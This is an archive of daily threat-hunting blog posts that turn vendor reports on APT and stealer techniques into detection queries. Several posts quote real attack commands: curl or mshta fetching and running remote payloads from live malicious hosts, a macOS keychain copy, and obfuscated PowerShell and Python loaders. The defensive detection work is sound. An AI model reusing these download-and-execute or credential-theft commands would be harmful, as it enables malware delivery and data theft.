Posts

Showing posts from May, 2025

151. Adversaries Abuse MST Transforms to Install Malware

Hello everyone! Another day - another interesting technique. Today we'll look at how adversaries, possibly APT32, abuse MST transforms to drop malware onto the compromised system. The threat actors distribute ISO files containing an LNK file with a double extension (pdf.lnk) and two hidden files: an MSI installer and an MST file. The LNK runs the following command:

"C:\Windows\System32\msiexec.exe" /qn /i WindowsPCHealthCheckSetup.msi TRANSFORMS=5ACXP.mst

As a result, a legitimate PcHealthCheck executable, along with the malicious tbs.dll dropped by the MST transform, ends up under %LocalAppData%\PCHealthCheck\. Can we hunt for suspicious MST transforms? Of course! For example:

event_type: "processcreatewin" AND proc_file_name: "msiexec.exe" AND cmdline: "TRANSFORMS"

See you tomorrow!

150. Adversaries Abuse Internet Query Files

Hello everyone! Let's look at another file type you don't often see attached to phishing emails: the IQY extension. An Internet Query file is a text file that Microsoft Excel uses to download data from the internet. I spotted it in this report on Bitter APT by EclecticIQ. Upon opening the file, Security Brief Report.iqy, the following command is executed:

cmd|' /c cd C:\\programdata & set /P=\"MZ\"<nul>b1 & curl -o b2 https://fogomyart[.]com/vcswin & copy /b b1+b2 vcswin.exe & start /b vcswin.exe'!A0

The command abuses cURL to download WmRAT from a remote server and executes it. For example, we can hunt for IQY files spawning commands that include cURL:

event_type: "processcreatewin" AND proc_p_cmdline: "iqy" AND cmdline: "curl"

See you tomorrow!

149. Adversaries Abuse Free Web Hosting Infrastructure

Hello everyone! Let's talk a bit about threat actors' infrastructure. As you know, adversaries need to store malicious files somewhere in order to distribute them. Of course, they can use their own infrastructure, but in many cases they opt for freely available alternatives. For example, APT41 (we track this cluster as Wanted Werewolf) abused various free web hosting services to distribute their malware. What does this mean? We can use it for hunting:

event_type: "dnsreq" AND dns_rname: ("workers.dev" OR "trycloudflare.com" OR "infinityfreeapp.com")

What's more, the threat actors used Google Calendar for C2! See you tomorrow!

148. Base64? And What About Base85?

Hello everyone! Adversaries always abuse Base64 to conceal malicious scripts, for example when abusing PowerShell or Python. But what about other encoding schemes? Let's look inside this report. The threat actors executed the Python Launcher, py.exe, with an obfuscated Python command as an argument:

"C:/winsystem/py/py.exe" -c exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode('[redacted]'))))

A Base85-encoded string is decoded, decompressed, deserialized, and then executed as Python code. As Base85 isn't very common in modern environments, we can use it to build our hunting query:

event_type: "processcreatewin" AND cmdline: "b85decode"

See you tomorrow!

147. Detecting a macOS Stealer

Hello everyone! We see lots of stealers for Windows. But what about macOS? Recently MalwareHunterTeam shared information on an interesting macOS malware sample. The sample abuses cURL to download a script from a remote server:

curl -sfo /tmp/up.sh https://www.appleprocesshub[.]com/fSidEOWW.sh && chmod 777 /tmp/up.sh && sh /tmp/up.sh

The adversary uses notable command line parameters to execute cURL, including -s (silent mode) and -f (fail silently). We can use this to build a hunting query:

event_type: "processcreatemac" AND proc_file_name: "curl" AND cmdline: "sfo"

The script collects system information as well as sensitive data, including the keychain, for example:

cp /Users/root/Library/Keychains/Login.keychain-db /tmp/20250516021858/VMQFcNm+96F/.keychain-db

This procedure can also be used to build a query:

event_type: "processcreatemac" AND proc_file_name: "cp" AND cmdline: "keychain"

Collected data is arc...
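The query above matches the literal flag cluster "sfo", so the same download written as "curl -f -s -o" or "--silent --fail --output" would slip past it. As an added example (my code, not from the post), here is the same rule with curl's short options actually parsed rather than substring-matched, run over a few constructed events; the event field names, sample URLs and the list of value-taking curl options are assumptions.

```python
import shlex
from typing import Callable, Dict, Iterable, List, Set

# Constructed macOS process-creation events (sample data, not real telemetry).
# Field names follow the query syntax used in the post.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"event_type": "processcreatemac", "proc_file_name": "curl",
     "cmdline": "curl -sfo /tmp/up.sh https://example.invalid/fSidEOWW.sh"},
    {"event_type": "processcreatemac", "proc_file_name": "curl",
     "cmdline": "curl -f -s -o /tmp/up.sh https://example.invalid/a.sh"},
    {"event_type": "processcreatemac", "proc_file_name": "curl",
     "cmdline": "curl --silent --fail --output=/tmp/up.sh https://example.invalid/b.sh"},
    {"event_type": "processcreatemac", "proc_file_name": "curl",
     "cmdline": "curl -o report.json https://example.invalid/api"},
    {"event_type": "processcreatemac", "proc_file_name": "sh",
     "cmdline": "sh /tmp/up.sh"},
]

# curl short options that consume a value (assumed subset): inside a cluster
# such as -sfo FILE the remainder of the cluster, or the next token, is the value.
ARG_OPTS = {"o", "d", "H", "u", "A", "X", "e", "K", "T", "x", "b", "c"}
# Long spellings of the three options this rule cares about.
LONG_TO_SHORT = {"--silent": "s", "--fail": "f", "--output": "o"}
SHELL_SEPARATORS = {"&&", "||", ";", "|"}


def curl_short_flags(cmdline: str) -> Set[str]:
    """Return the single-letter curl options present in a command line,
    normalising --silent/--fail/--output to s/f/o and skipping option values."""
    flags: Set[str] = set()
    skip_next = False
    for tok in shlex.split(cmdline)[1:]:       # drop argv[0]
        if tok in SHELL_SEPARATORS:            # stop at the end of the curl command
            break
        if skip_next:
            skip_next = False
            continue
        if tok.startswith("--"):
            short = LONG_TO_SHORT.get(tok.split("=", 1)[0])
            if short:
                flags.add(short)
                # --output FILE consumes the next token; --output=FILE does not
                skip_next = short in ARG_OPTS and "=" not in tok
            continue
        if tok.startswith("-") and len(tok) > 1:
            for i, ch in enumerate(tok[1:]):
                flags.add(ch)
                if ch in ARG_OPTS:
                    # value is the rest of this cluster, or the next token if none
                    skip_next = i == len(tok) - 2
                    break
    return flags


def naive_match(event: Dict[str, str]) -> bool:
    """The post's query as literally written: a substring check for "sfo"."""
    return (event["event_type"] == "processcreatemac"
            and event["proc_file_name"] == "curl"
            and "sfo" in event["cmdline"].lower())


def parsed_match(event: Dict[str, str]) -> bool:
    """Same intent, independent of flag order and spelling: silent, fail
    silently and write to a file, however the operator typed them."""
    if event["event_type"] != "processcreatemac" or event["proc_file_name"] != "curl":
        return False
    return {"s", "f", "o"} <= curl_short_flags(event["cmdline"])


def hunt(events: Iterable[Dict[str, str]], matcher: Callable[[Dict[str, str]], bool]) -> List[str]:
    """Return the command lines of the events the matcher flags."""
    return [e["cmdline"] for e in events if matcher(e)]


if __name__ == "__main__":
    print("naive :", hunt(SAMPLE_EVENTS, naive_match))    # only the -sfo spelling
    print("parsed:", hunt(SAMPLE_EVENTS, parsed_match))   # all three downloads
```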

146. Adversaries Abuse Haihaisoft PDF Reader to Deliver Rhadamanthys Stealer

Hello everyone! As you know, stealers are the most common threats nowadays. What does this mean? Threat actors keep finding new ways to deliver them to the target system. Let's look at a Rhadamanthys campaign uncovered by Cybereason. The adversary abused a renamed Haihaisoft PDF Reader executable (for example, Preuve de la violation.pdf .exe) to sideload a malicious DLL (msimg32.dll), which enabled persistence and downloaded the stealer payload. As we're dealing with a renamed executable, we can use this to build our detection logic:

event_type: "processcreatewin" AND proc_file_originalfilename: "hpreader.exe" AND NOT proc_file_name: "hpreader.exe"

See you tomorrow!

145. Detecting Fake CAPTCHA Attacks

Hello everyone! I think you have at least heard about fake CAPTCHA attacks. Yes, ClickFix again. The thing is, adversaries use fake CAPTCHA pages to trick users into executing malicious commands on Windows. These pages mimic a legitimate human verification prompt and instruct users to paste a malicious command into the Run dialog (Win + R) as part of the "verification" process. This Trend Micro report provides lots of examples of these commands we can use to build detections:

mshta.exe hxxps://ernier[.]shop/lyricalsync[.]mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203
mshta.exe hxxps://zb-files[.]oss-ap-southeast-1[.]aliyuncs[.]com/DPST_doc.mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 815403
mshta.exe hxxp://ok[.]fish-cloud-jar[.]us/ # "Authentication needed: Secure Code 3V8MUR-9PW4S"
mshta.exe hxxps://x63-hello[.]live/nF3mXcQ9FVjs1sMt[.]html #'' I'm human ID241619''
cmd /c "powershell -w h -e aQBlAHgAKABpAHcAcgAgAC0AVQ...

144. Hunting for Obfuscated PowerShell Scripts

Hello everyone! Yes, it looks like we can talk about PowerShell abuse forever! For example, adversaries often try to obfuscate malicious PowerShell scripts. Let's look at an example:

$udVDkdtSF =([regex]::Matches('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','.{2}') | % { [char]([Convert]::ToByte($_.Value,16) -bxor '2') }) -join '';& $udVDkdtSF.Substring(0,3) $...

143. Hunting for Qemu Emulator Abuse

Hello everyone! One more interesting technique covered in a Sophos report: abusing the QEMU emulator to run a Windows 7 virtual machine with the QDoor trojan pre-installed. The adversary executed the following command:

"C:\ProgramData\UpdatePackage_excic\wexe" -m 4096 -hda Update_excic.qcow2 -netdev user,id=mynet0 -device e1000,netdev=mynet0 -cpu max -display none

As you can see, the virtual machine is connected to the targeted system's network interface. Of course, we can use this for hunting:

event_type: "processcreatewin" AND proc_file_productname: "qemu" AND cmdline: "netdev"

See you tomorrow!

142. Detecting RMMs from Ransomware Affiliate's Toolkit: Syncro Live Agent

Hello everyone! If you looked through the report I shared yesterday, you should have spotted another interesting legitimate tool abused by threat actors. This time it's an RMM called Syncro Live Agent. Interestingly, according to the report, the agent was never actually used by the adversary. But that doesn't mean we shouldn't detect it! We can use a very simple query to hunt for the tool, for example:

event_type: "processcreatewin" AND proc_file_productname: "syncrolive"

Yes, that easy! See you tomorrow!

141. Inside 3AM Ransomware Toolkit: GoodSync

Hello everyone! Let's keep digging into ransomware affiliates' toolkit. This time we'll focus on the data exfiltration stage. According to a Sophos report, 3AM ransomware affiliates leveraged a legitimate tool called GoodSync:

"On two hosts, the threat actor installed a legitimate cloud synchronization tool called GoodSync, which is compatible with Microsoft, Google, Amazon, Dropbox, and other services. They then used GoodSync to upload approximately 868 GB of data from those servers to the cloud storage provider Backblaze."

Transferring data to cloud storage is a quite common tactic, but adversaries always experiment with their toolset. As always, we can hunt for execution events related to the tool:

event_type: "processcreatewin" AND proc_file_productname: "goodsync"

The report contains lots of interesting behavior markers, make sure to check it! See you tomorrow!

140. Hunting for Masqueraded Malicious Files: Adwind

Hello everyone! Adversaries always try to masquerade malicious files so they look absolutely legitimate. Today we'll look at an Adwind campaign reported by CERT-AGID. The malicious JAR file was disguised as an image:

"C:\Users\Public\InvoiceXpress\bin\java.exe" -jar -noverify "C:\Users\Public\InvoiceXpress\bin\InvoiceXpress.png"

This makes the malicious file look legitimate, but at the same time gives us detection opportunities! For example:

event_type: "processcreatewin" AND proc_file_name: "java.exe" AND cmdline: "png"

Of course, you can experiment with file extensions as well as executables; for example, you can hunt for rundll32.exe and regsvr32.exe. See you tomorrow!

139. LOLBAS Abused by DBatLoader: Detection Opportunities

Hello everyone! We know a lot about LOLBAS. But we usually see only some of them used ITW. So I'm always excited to see less common examples. Today we'll look at two of them, esentutl.exe and extrac32.exe, as seen in this report on DBatLoader. Both executables are used to copy legitimate command and scripting interpreters: Windows Command Shell and PowerShell. The first example is related to Windows Command Shell:

esentutl /y C:\Windows\System32\cmd.exe /d C:\Users\Public\alpha.pif /o

We can use it to build the query:

event_type: "processcreatewin" AND proc_file_name: "esentutl.exe" AND cmdline: ("cmd.exe" OR "powershell.exe")

The second is related to PowerShell:

extrac32.exe /C /Y C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\xkn.pif

Here we can use a very similar query:

event_type: "processcreatewin" AND proc_file_name: "extrac32.exe" AND cmdline: ("cmd.exe" OR "powershell...

138. Hunting for File Transfer Sites Access

Hello everyone! Adversaries often abuse legitimate file transfer sites, both for data exfiltration and for ingress tool transfer. For example, Scattered Spider (Muddled Libra, 0ktapus, Scatter Swine, UNC3944). According to a Unit42 report, the threat actors leveraged the following file transfer sites: put[.]io, transfer[.]sh, wasabi[.]com, gofile[.]io. As always, we can use this to build our hunting query, for example:

event_type: dnsreq* AND dns_rname: ("put.io" OR "transfer.sh" OR "wasabi.com" OR "gofile.io")

See you tomorrow!

137. Hunting for Mshta Abuse

Hello everyone! Reading various reports, I see adversaries abuse mshta.exe again and again. Very often I see them leverage it to execute a remotely hosted malicious .hta file. Here's a recent example from a Qualys report:

"C:\Windows\system32\mshta.exe" httpS://mytaxclientcopy[.]com/xlab22.hta

Should we have hunting queries for similar activity? Of course! Hunting queries, because not all .hta files executed from remote hosts are malicious. Still, you should not get too many hits. To build our hunting query, we can use, for example, the "http" and "https" keywords:

event_type: "processcreatewin" AND proc_file_name: "mshta.exe" AND cmdline: ("http" OR "https")

See you tomorrow!

136. Hunting for Discovery Techniques

Hello everyone! I'm sure you know that threat actors always need to collect information about the compromised system. In most cases this happens at early stages of the attack lifecycle, so it's always great to have related hunting queries. Let's look at the following example related to TA406:

$rc = Get-ChildItem ([Environment]::GetFolderPath('Recent'))
$ic = ipconfig /all
$gp = Get-process
$antivirusInfo = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntivirusProduct
$anvi = $antivirusInfo | Select-Object DisplayName, ProductState, PathToSignedProductExe
$db = Get-Disk | Get-Partition | Select-Object DiskNumber, DriveLetter

As you can see, the adversary collects information on recent file names, processes, antivirus software, etc. All of this can be used during your hunting missions, of course! For example, as it's an excerpt from a PowerShell script, we can search for the collection of recent file names in ScriptBlock logs:

event_type: "Scr...

135. Hunting for DarkCloud Stealer

Hello everyone! Today I want to show you that your previously created hunting queries can cover many different threats. As you remember, we created the following query to hunt for suspicious .vbs files in the startup folder:

event_type: "processcreatewin" AND cmdline: ("startup" AND "vbs")

We can use the same query to hunt for DarkCloud Stealer, as it has a similar behavior marker:

wscript.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs"

Another interesting marker related to this threat is the abuse of showip[.]net to check the victim's public IP address:

event_type: "dnsreqwin" AND dns_rname: "showip.net"

See you tomorrow!

134. TrueSightKiller: Another Tool to Kill Your EDR

Hello everyone! I know you enjoy AV\EDR killers, so I decided to share information on another one with you! This tool was used, for example, by Earth Ammit. I'm talking about TrueSightKiller. Just like many other EDR killers, this one creates typical artifacts we can use for detection. For example, it loads the truesight.sys driver. We can use it to build our query:

event_type: "driverloadwin" AND file_name: "truesight.sys"

Another typical artifact is creating a new service:

event_type: "serviceinstallwin" AND service_name: "TrueSight"

And finally, the executable's metadata, for example:

event_type: "processcreatewin" AND proc_file_productname: "Truesight"

See you tomorrow!

133. Marbled Dust: What to Hunt for?

Hello everyone! Today we'll discuss a fresh report by Microsoft Threat Intelligence on Marbled Dust. The adversary exploited a zero-day vulnerability in Output Messenger Server Manager (CVE-2025-27920). This directory traversal vulnerability enabled the threat actors to upload malicious files into the server's startup directory. For example, the adversary dropped the malicious files OM.vbs and OMServerService.vbs into the Output Messenger server startup folder, and the malicious file OMServerService.exe into the server's C:\Users\public\videos directory. First, we can hunt for suspicious .vbs files executed from the startup folder:

event_type: "processcreatewin" AND cmdline: ("startup" AND "vbs")

Second, we can hunt for suspicious files executed from C:\Users\public\videos:

event_type: "processcreatewin" AND proc_file_path: "users\\public\\videos"

See you tomorrow!

132. Threat Actors Abuse N‑sight RMM to Attack Brazilian Organizations

Hello everyone! Adversaries keep showing interest in legitimate tools, especially RMMs. According to a Cisco Talos report, the threat actors ran a spam campaign against Brazilian users, weaponizing N‑sight RMM. Interestingly, N-able also provides security solutions and an MDR service, which makes such tools even more trusted. For example, the RMM agent currently has 0 detections on VirusTotal. We can use product-related metadata to build our hunting query:

event_type: "processcreatewin" AND proc_file_productname: "Advanced Monitoring Agent"

Also, you may want to hunt for file creation events in related folders:

event_type: "filecreatewin" AND file_path: "Advanced Monitoring Agent"

See you tomorrow!

131. Adversaries Abuse SFTP to Deliver Lumma Stealer

Hello everyone! Stealers are everywhere! And adversaries keep finding new delivery methods. Today we'll look at how the threat actors involved in Lumma Stealer distribution abuse SFTP. According to a Sophos report, the threat actors distributed malicious LNK files disguised as PDFs, which abused sftp.exe to execute an obfuscated command:

C:\Windows\System32\OpenSSH\sftp.exe -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/W7]]]7Z9]]]].mp4]]'  -replace ']')

Just like in the case we discussed recently, the adversary leveraged ProxyCommand for proxy execution. And, of course, we can use it for hunting:

event_type: "processcreatewin" AND proc_file_name: "sftp.exe" AND cmdline: "proxycommand"

See you tomorrow!

130. Cactus Ransomware Gang Abuses Microsoft Quick Assist

Hello everyone! Adversaries always want to blend in with the compromised environment. We've already talked a lot about various legitimate tools abused by threat actors, but in many cases they don't even need to bring such tools. For example, according to a Cisco Talos report, Cactus ransomware affiliates directed victims to initiate a Microsoft Quick Assist remote access session, and even helped them install the program if it was not already present on the user's system. With a proper baseline, such tools are great targets for threat hunting. The query may be as easy as the following:

event_type: "processcreatewin" AND proc_file_name: "QuickAssist.exe"

Hope your threat hunting missions are going well! See you tomorrow!

129. Ransomware Operators Abuse Employee Monitoring Software

Hello everyone! Here's another curious case of legitimate software abuse. According to a Synacktiv report, Hunters International used KickIdler, legitimate employee monitoring software, to spy on the victim, perform reconnaissance and harvest credentials. This tool, for example, allows the threat actors to perform keylogging, screen capture and audio capture, enables remote control, and provides other features that are interesting from the attacker's perspective. First of all, we can hunt for files with the related signature:

event_type: "processcreatewin" AND proc_file_sig: "TELE LINK SOFT (TLS) CY LTD"

Next, we can hunt for related DNS queries:

event_type: "dnsreqwin" AND dns_rname: "my.kickidler.com"

You can also hunt for file creation events in the tool-related folders:

event_type: "filecreatewin" AND file_path: "TeleLinkSoftHelper"

See you tomorrow!

128. Hunting for Charming Kitten

Hello everyone! I rarely see adversaries use malicious documents nowadays. But I see LNK files more and more often! Today we'll look at another example, which belongs to Charming Kitten (we track this activity cluster as Cypress Werewolf). The malicious LNK file distributed by the threat actors contained the following command:

conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='osf.zip';$pd='Arda.pdf';$pdl='Arda.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length]...

127. Detecting RMMs from Ransomware Affiliate's Toolkit: Supremo

Hello everyone! Let's keep looking at RMMs observed in ransomware gangs' toolkit. This time we'll look at Supremo. It's a legitimate remote access tool observed being used by Black Basta ransomware affiliates ITW. Usually the adversary does not modify the binary, so it looks absolutely legitimate. This means we can focus on metadata again and again. So here's the query:

event_type: "processcreatewin" AND proc_file_productname: "Supremo Remote Control"

The same can be said about file creation events in the tool-related folders:

event_type: "filecreate" AND file_path: "SupremoRemoteDesktop"

What other interesting RMMs used by ransomware affiliates have you seen? See you tomorrow!

126. Adversaries Bypass EDR Protection with Bring Your Own Installer Technique

Hello everyone! Another day - another EDR bypass technique. In a recent report, Aon's Stroz Friedberg Incident Response Team identified a Bring Your Own Installer technique used by a threat actor to bypass SentinelOne EDR. The adversary leveraged a legitimate SentinelOne EDR installer to start the agent upgrade process, but interrupted it by terminating the msiexec.exe process associated with the SentinelOne version change. If the telemetry is still available, we can hunt for suspicious msiexec.exe termination events, for example via taskkill:

event_type: "processcreatewin" AND proc_file_name: "taskkill" AND cmdline: "msiexec"

See you tomorrow!

125. Hunting for More_eggs Backdoor

Hello everyone! Yesterday we talked about some new tools developed by the threat actor known as Venom Spider. But let's talk a bit about a classic tool it's known for: the more_eggs backdoor. It's still in use; for example, here's a fresh campaign covered by Arctic Wolf. I want to point out the following behavior marker: msxsl.exe, a legitimate binary known as Microsoft's Command Line Transformation Utility, is used to execute the backdoor:

msxsl.exe D30F38D93CA9185.txt D30F38D93CA9185.txt

We can use this marker to build our hunting query:

event_type: "processcreatewin" AND proc_file_name: "msxsl.exe" AND cmdline: "txt"

Have you observed msxsl.exe in your environment? See you tomorrow!

124. That's How Adversaries Abuse PowerShell for Timestomping

Hello everyone! Still adding interesting items to my PowerShell collection! This morning I was reading this report and spotted another ITW example of abusing PowerShell for timestomping. The adversary created scheduled tasks to execute MeshAgent, and after that executed PowerShell commands to timestomp the related files. Here are some examples:

(Get-Item ".\vcruntime140_1.dll").LastAccessTime=("12 May 2024 11:14:00") `
(Get-Item ".\vcruntime140_1.dll").LastWriteTime=("12 May 2024 11:14:00") `
(Get-Item ".\vcruntime140_1.dll").CreationTime=("12 May 2024 11:14:00") `
(Get-Item ".\vcruntime140.dll").LastAccessTime=("12 May 2024 11:14:00") `
(Get-Item ".\vcruntime140.dll").LastWriteTime=("12 May 2024 11:14:00") `
(Get-Item ".\vcruntime140.dll").CreationTime=("12 May 2024 11:14:00")

For example, we can use ScriptBlock events to hunt for Get-Item cmdlet abuse:

event_type: "ScriptExecutionWin" AND script_text: "get-item" AND ("lastaccesstime" OR "lastwr...

123. Hunting for Golden Chickens' New Malware

Hello everyone! Insikt Group uncovered two new malware families: TerraStealerV2 and TerraLogger. Both were attributed to the threat actor known as Golden Chickens. The adversary provides tools to other criminals, operating a Malware-as-a-Service (MaaS) platform. I've looked through the report and (as always) caught a few detection and hunting opportunities. For example, the adversary abused ssh.exe to proxy PowerShell execution:

ssh.exe" -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"

We can hunt for similar activity using the following query:

event_type: "processcreatewin" AND proc_file_name: "ssh.exe" AND cmdline: "proxycommand"

Next, abusing regsvr32.exe to execute a malicious OCX file:

regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx

We can use the following query to hunt for OCX...

122. APT36 Abuses PowerPoint PPAM Files to Deliver Crimson RAT

Hello everyone! We've already talked a few times about how adversaries abuse PowerPoint to deliver malware. It's time to discuss it again! Seqrite has published a report on APT36 activity (we track this activity cluster as Translucent Werewolf). According to this research, the threat actors leveraged PowerPoint add-in files (PPAM) to deliver Crimson RAT. My observations suggest that such files are not very common in modern environments, so we can hunt for PPAM opening events:

event_type: "processcreatewin" AND proc_file_name: "powerpnt.exe" AND cmdline: "ppam"

See you tomorrow!

121. Detecting Earth Kasha's ROAMINGMOUSE

Hello everyone! Reading Trend Micro's report on Earth Kasha, I spotted a curious behavior marker of ROAMINGMOUSE: it abuses WMI to execute JSLNTOOL.EXE via explorer.exe. JSLNTOOL.EXE is a legitimate application used by the adversary to sideload JSFC.dll, a malicious loader. This means we can hunt for suspicious executions of explorer.exe via wmiprvse.exe:

event_type: "processcreatewin" AND proc_file_path: "explorer.exe" AND proc_p_file_path: "wmiprvse.exe"

As for JSLNTOOL.EXE, you can also hunt for related execution events, focusing on uncommon locations:

event_type: "processcreatewin" AND proc_file_originalfilename: "jslntool.exe" AND NOT proc_file_path: "justsystems"

See you tomorrow!